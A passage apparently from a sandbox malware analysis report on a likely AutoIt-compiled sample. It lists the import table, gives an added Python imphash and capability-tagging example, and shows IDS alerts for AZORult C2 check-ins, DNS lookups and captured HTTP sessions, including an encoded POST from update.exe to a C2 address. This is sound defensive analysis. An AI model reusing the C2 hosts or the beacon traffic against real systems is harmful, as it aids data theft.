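On a real sample the RESOURCES list would come from the resource directory (for example via pefile) and `find_au3_marker` would be run over the extracted RT_RCDATA bytes; finding the marker is what turns "likely AutoIt" into "extract the script and read it" rather than reversing the interpreter.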
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
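The "Import Hash" reported above is the Mandiant imphash: the MD5 of the lower-cased dll.function pairs in import-directory order, with the DLL extension stripped. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that computes an imphash over an import list and tags the imports with the capability buckets an analyst scans for (process injection, token manipulation, input capture and injection, registry persistence, anti-debugging, networking). The import list is a constructed subset copied from the table above, and the table groups functions by DLL in the order Joe Sandbox prints rather than guaranteeing raw import-directory order, so the hash printed here is not expected to reproduce afcdf79be1557326c854b6e20cb900a7; the capability grouping is the example's own, not the report's. One caveat the report itself supports: it rates the binary as a likely compiled AutoIt script, and imports such as WriteProcessMemory, LogonUserW, BlockInput, SendInput, mciSendStringW and the WSOCK32/WININET functions are the AutoIt3 runtime's own import table, shared by every compiled script. They tell you what the interpreter can do, not what this script does; for that, rely on the behavioural findings in the report and on the extracted script.

```python
import hashlib

# Imports as listed in the report, constructed subset in the printed DLL order.
IMPORTS = [
    ("WSOCK32.dll", ["WSACleanup", "socket", "connect", "send", "recv", "gethostbyname"]),
    ("WININET.dll", ["InternetOpenW", "HttpOpenRequestW", "HttpSendRequestW", "InternetReadFile"]),
    ("KERNEL32.dll", ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory",
                      "CreateToolhelp32Snapshot", "Process32FirstW", "IsDebuggerPresent",
                      "OutputDebugStringW", "CreateProcessW", "Sleep"]),
    ("USER32.dll", ["GetAsyncKeyState", "GetKeyboardState", "SendInput", "keybd_event",
                    "mouse_event", "BlockInput", "GetClipboardData", "SetClipboardData"]),
    ("ADVAPI32.dll", ["RegSetValueExW", "RegCreateKeyExW", "AdjustTokenPrivileges",
                      "LogonUserW", "DuplicateTokenEx", "CreateProcessAsUserW",
                      "CreateProcessWithLogonW", "OpenProcessToken"]),
    ("SHELL32.dll", ["ShellExecuteExW", "ShellExecuteW", "SHEmptyRecycleBinW"]),
]

# Capability buckets for triage. This grouping is the example's own, not the report's.
CAPABILITIES = {
    "process_injection": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"},
    "process_discovery": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "anti_debug": {"IsDebuggerPresent", "OutputDebugStringW"},
    "input_capture": {"GetAsyncKeyState", "GetKeyboardState", "GetClipboardData"},
    "input_injection": {"SendInput", "keybd_event", "mouse_event", "BlockInput"},
    "registry_persistence": {"RegSetValueExW", "RegCreateKeyExW"},
    "token_manipulation": {"AdjustTokenPrivileges", "LogonUserW", "DuplicateTokenEx",
                           "CreateProcessAsUserW", "CreateProcessWithLogonW", "OpenProcessToken"},
    "network": {"socket", "connect", "send", "recv", "gethostbyname", "InternetOpenW",
                "HttpOpenRequestW", "HttpSendRequestW", "InternetReadFile"},
}


def imphash_string(imports) -> str:
    """The string imphash hashes: 'dll.func' pairs, lower-cased, DLL extension stripped,
    in import-directory order, comma-joined. Ordinal-only imports (none listed for this
    sample) would need the ws2_32/oleaut32 ordinal-to-name tables, which are omitted."""
    parts = []
    for dll, funcs in imports:
        base = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if base.endswith(ext):
                base = base[: -len(ext)]
                break
        parts.extend(f"{base}.{func.lower()}" for func in funcs)
    return ",".join(parts)


def imphash(imports) -> str:
    """Hex MD5 over the imphash string; order-sensitive by design."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


def tag_capabilities(imports):
    """Map each capability bucket to the imported functions that hit it. Buckets with no
    hits are dropped so the result is the analyst's short list, not the whole table."""
    imported = {func for _dll, funcs in imports for func in funcs}
    hits = {cap: sorted(imported & names) for cap, names in CAPABILITIES.items()}
    return {cap: funcs for cap, funcs in hits.items() if funcs}


if __name__ == "__main__":
    print("imphash over the listed subset:", imphash(IMPORTS))
    for cap, funcs in tag_capabilities(IMPORTS).items():
        print(f"{cap:22s} {', '.join(funcs)}")
```

Against a real file the import list comes from the import directory (pefile's `DIRECTORY_ENTRY_IMPORT`), and the imphash is most useful as a pivot: every AutoIt3-compiled binary of the same runtime version shares it, so a match clusters the packaging, not the actor or the payload.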
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-02T02:27:06.133438+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.79.229 | 443 | TCP
2025-01-02T02:28:17.624409+0100 | 2029465 | ET MALWARE Win32/AZORult V3.2 Client Checkin M15 | 1 | 192.168.2.4 | 49854 | 92.63.192.63 | 80 | TCP
2025-01-02T02:28:17.624409+0100 | 2810276 | ETPRO MALWARE AZORult CnC Beacon M1 | 1 | 192.168.2.4 | 49854 | 92.63.192.63 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 02:27:05.615962982 CET | 49939 | 53 | 192.168.2.4 | 1.1.1.1
Jan 2, 2025 02:27:05.636497021 CET | 53 | 49939 | 1.1.1.1 | 192.168.2.4
Jan 2, 2025 02:27:07.366533041 CET | 53873 | 53 | 192.168.2.4 | 1.1.1.1
Jan 2, 2025 02:27:07.401484013 CET | 53 | 53873 | 1.1.1.1 | 192.168.2.4
Jan 2, 2025 02:27:09.960901976 CET | 60551 | 53 | 192.168.2.4 | 1.1.1.1
Jan 2, 2025 02:27:09.983918905 CET | 53 | 60551 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 2, 2025 02:27:05.615962982 CET | 192.168.2.4 | 1.1.1.1 | 0x8a85 | Standard query (0) | 2no.co | A (IP address) | IN (0x0001) | false
Jan 2, 2025 02:27:07.366533041 CET | 192.168.2.4 | 1.1.1.1 | 0xa2b1 | Standard query (0) | www.chameleon-managers.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 02:27:09.960901976 CET | 192.168.2.4 | 1.1.1.1 | 0x924a | Standard query (0) | neosoft-activator.appspot.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 2, 2025 02:27:05.636497021 CET | 1.1.1.1 | 192.168.2.4 | 0x8a85 | No error (0) | 2no.co | | 104.21.79.229 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 02:27:05.636497021 CET | 1.1.1.1 | 192.168.2.4 | 0x8a85 | No error (0) | 2no.co | | 172.67.149.76 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 02:27:07.401484013 CET | 1.1.1.1 | 192.168.2.4 | 0xa2b1 | No error (0) | www.chameleon-managers.com | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 2, 2025 02:27:07.401484013 CET | 1.1.1.1 | 192.168.2.4 | 0xa2b1 | No error (0) | ghs.googlehosted.com | | 142.250.185.115 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 02:27:09.983918905 CET | 1.1.1.1 | 192.168.2.4 | 0x924a | No error (0) | neosoft-activator.appspot.com | | 172.217.16.212 | A (IP address) | IN (0x0001) | false
• 2no.co
• neosoft-activator.appspot.com
• www.chameleon-managers.com
• 92.63.192.63
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 142.250.185.115 | 80 | 3848 | C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 02:27:07.413440943 CET | 216 | OUT | GET /static/?category=install&action=install&label=paid&uid=&prg=explorer HTTP/1.1
User-Agent: Chameleon Static (Ver: 3.0.0.505)
Host: www.chameleon-managers.com
Connection: Keep-Alive
Cache-Control: no-cache
Jan 2, 2025 02:27:08.737328053 CET | 401 | IN | HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Set-Cookie: cham_uid=5153dce68ee7dc529e3ee1aac6d1b34a; expires=Fri, 02-Jan-2026 01:27:08 GMT; Path=/
X-Cloud-Trace-Context: 8346c0596dd5ff8e90c2751fa595580a;o=1
Date: Thu, 02 Jan 2025 01:27:08 GMT
Server: Google Frontend
Content-Length: 32
Expires: Thu, 02 Jan 2025 01:27:08 GMT
Data Raw: 35 31 35 33 64 63 65 36 38 65 65 37 64 63 35 32 39 65 33 65 65 31 61 61 63 36 64 31 62 33 34 61
Data Ascii: 5153dce68ee7dc529e3ee1aac6d1b34a
Jan 2, 2025 02:27:08.737344980 CET | 401 | IN | HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Set-Cookie: cham_uid=5153dce68ee7dc529e3ee1aac6d1b34a; expires=Fri, 02-Jan-2026 01:27:08 GMT; Path=/
X-Cloud-Trace-Context: 8346c0596dd5ff8e90c2751fa595580a;o=1
Date: Thu, 02 Jan 2025 01:27:08 GMT
Server: Google Frontend
Content-Length: 32
Expires: Thu, 02 Jan 2025 01:27:08 GMT
Data Raw: 35 31 35 33 64 63 65 36 38 65 65 37 64 63 35 32 39 65 33 65 65 31 61 61 63 36 64 31 62 33 34 61
Data Ascii: 5153dce68ee7dc529e3ee1aac6d1b34a


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49739 | 142.250.185.115 | 80 | 4364 | C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 02:27:31.735615015 CET | 164 | OUT | GET /info/versions/ HTTP/1.1
User-Agent: Chameleon checker ( Ver: 3.0.0.505)
Host: www.chameleon-managers.com
Connection: Keep-Alive
Cache-Control: no-cache
Jan 2, 2025 02:27:32.531635046 CET | 840 | IN | HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Set-Cookie: cham_uid=9e088b8f013dd543cfee9c31a7018509; expires=Fri, 02-Jan-2026 01:27:32 GMT; Path=/
X-Cloud-Trace-Context: 5794fb2dd1ba846045c4cc74f179df7d;o=1
Date: Thu, 02 Jan 2025 01:27:32 GMT
Server: Google Frontend
Content-Length: 470
Expires: Thu, 02 Jan 2025 01:27:32 GMT
Data Raw: 3c 3f 0a 24 73 74 61 72 74 75 70 5f 66 75 6c 6c 5f 76 65 72 5f 64 61 64 61 67 6f 6f 3d 22 33 2e 32 2e 30 2e 37 31 32 22 3b 0a 24 73 74 61 72 74 75 70 5f 66 75 6c 6c 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 39 31 34 22 3b 0a 24 73 74 61 72 74 75 70 5f 62 65 74 61 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 39 31 34 22 3b 0a 24 77 69 6e 64 6f 77 5f 66 75 6c 6c 5f 76 65 72 3d 22 32 2e 32 2e 30 2e 34 32 38 22 3b 0a 24 77 69 6e 64 6f 77 5f 62 65 74 61 5f 76 65 72 3d 22 32 2e 32 2e 30 2e 34 32 38 22 3b 0a 24 74 61 73 6b 5f 66 75 6c 6c 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 37 38 32 22 3b 0a 24 74 61 73 6b 5f 62 65 74 61 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 37 38 32 22 3b 0a 24 65 78 70 6c 6f 72 65 72 5f 66 75 6c 6c 5f 76 65 72 3d 22 33 2e 30 2e 30 2e 35 30 30 22 3b 0a 24 65 78 70 6c 6f 72 65 72 5f 62 65 74 61 5f 76 65 72 3d 22 33 2e 30 2e 30 2e 35 30 30 22 3b 0a 24 76 6f 6c 75 6d 65 5f 66 75 6c 6c 5f 76 65 72 3d 22 31 2e 30 2e 30 2e 31 33 32 22 3b 0a 24 76 6f 6c 75 6d 65 5f 62 65 74 61 5f 76 65 72 3d 22 31 2e 30 2e 30 2e [TRUNCATED]
Data Ascii: <?$startup_full_ver_dadagoo="3.2.0.712";$startup_full_ver="4.0.0.914";$startup_beta_ver="4.0.0.914";$window_full_ver="2.2.0.428";$window_beta_ver="2.2.0.428";$task_full_ver="4.0.0.782";$task_beta_ver="4.0.0.782";$explorer_full_ver="3.0.0.500";$explorer_beta_ver="3.0.0.500";$volume_full_ver="1.0.0.132";$volume_beta_ver="1.0.0.132";$shutdown_full_ver="1.2.2.40";$shutdown_beta_ver="1.2.2.40";$folder_full_ver="2.0.10.400";$folder_beta_ver="2.0.10.400";?>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49854 | 92.63.192.63 | 80 | 6332 | C:\Users\user\AppData\Roaming\update.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 02:28:16.939749956 CET | 266 | OUT | POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 92.63.192.63
Content-Length: 107
Cache-Control: no-cache
Data Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 28 39 f1 4c 2f fb 3a 2f fb 3a 2f fb 39 2f fb 35 48 ed 3f 4e ed 3e 33 ed 3e 3f ed 3e 3e ed 3e 39 ed 3e 38 8a 4f 2f fb 3a 4b
Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9LN>2><>=>2?N(9L/:/:/9/5H?N>3>?>>>9>8O/:K
Jan 2, 2025 02:28:17.624355078 CET | 345 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.20.2
Date: Thu, 02 Jan 2025 01:28:17 GMT
Content-Type: text/html
Content-Length: 145
Connection: close
Location: http://92.63.192.63/index.html
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49858 | 92.63.192.63 | 80 | 6332 | C:\Users\user\AppData\Roaming\update.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 02:28:17.630192041 CET | 162 | OUT | GET /index.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 92.63.192.63
Cache-Control: no-cache
Connection: Keep-Alive
Jan 2, 2025 02:28:18.354083061 CET | 241 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 02 Jan 2025 01:28:18 GMT
Content-Type: text/html
Content-Length: 15793
Last-Modified: Wed, 19 Jan 2022 11:10:18 GMT
Connection: keep-alive
ETag: "61e7f19a-3db1"
Accept-Ranges: bytes
Jan 2, 2025 02:28:18.354199886 CET | 1236 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22
Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Jan 2, 2025 02:28:18.354211092 CET | 1236 | IN | Data Raw: 43 4e 44 51 77 52 6b 4e 45 52 6a 45 78 52 54 5a 42 52 6a 55 31 4f 45 5a 42 4d 6b 4a 47 51 30 45 32 52 6a 49 30 49 6a 34 67 50 48 68 74 63 45 31 4e 4f 6b 52 6c 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62
Data Ascii: CNDQwRkNERjExRTZBRjU1OEZBMkJGQ0E2RjI0Ij4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3
Jan 2, 2025 02:28:18.354227066 CET | 448 | IN | Data Raw: 37 44 43 6f 61 68 47 37 30 6a 45 53 77 64 30 6e 52 4f 42 45 66 38 39 41 65 52 50 74 71 4a 49 6f 47 49 65 30 4e 62 6b 7a 37 62 4a 30 71 57 54 6a 53 34 4c 4f 52 7a 45 6c 5a 51 67 4d 6b 66 50 77 72 73 65 67 55 4c 61 53 53 4c 48 42 6d 41 59 38 36 32
Data Ascii: 7DCoahG70jESwd0nROBEf89AeRPtqJIoGIe0Nbkz7bJ0qWTjS4LORzElZQgMkfPwrsegULaSSLHBmAY862upET1q5LZOiQfgC+jvOMVo6gUE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwY
Jan 2, 2025 02:28:18.354345083 CET | 1236 | IN | Data Raw: 4f 51 37 51 7a 76 4d 41 39 32 70 71 47 79 44 31 75 55 49 52 37 64 58 31 4f 59 58 38 45 34 7a 76 55 6d 52 34 6b 68 37 4a 78 55 42 45 43 47 77 69 78 53 36 4c 4a 36 51 68 39 5a 4b 37 71 45 67 48 78 31 6a 6e 79 48 6a 48 64 74 70 71 65 2f 32 38 55 66
Data Ascii: OQ7QzvMA92pqGyD1uUIR7dX1OYX8E4zvUmR4kh7JxUBECGwixS6LJ6Qh9ZK7qEgHx1jnyHjHdtpqe/28UfBD3cmAeKVbhhIgFRkr0sDqlYFkhyrxRZuwjzgDf3LGgZxV5EdIrSUoTEl8bmwTXW0Xifrc9Q1c1OX5zoPIzQ6ou5jRVV7yX43eclynGs7aWaxJmd4MCUE072v9Wmn3EwnxcSfcbK7Nnnf/khv/qgsdgVdnAmCng+f
Jan 2, 2025 02:28:18.354357958 CET | 1236 | IN | Data Raw: 73 4c 4e 4a 61 64 69 6a 6d 2b 55 54 49 4d 67 39 37 78 72 64 4a 2f 76 6f 67 49 7a 32 56 4b 61 6e 4a 5a 59 73 4f 43 79 75 54 34 45 32 42 4f 78 42 77 6e 5a 49 34 44 46 38 67 4a 6c 45 4e 39 4b 75 73 6f 6c 73 4c 32 30 48 53 33 53 67 54 56 6e 31 6a 77
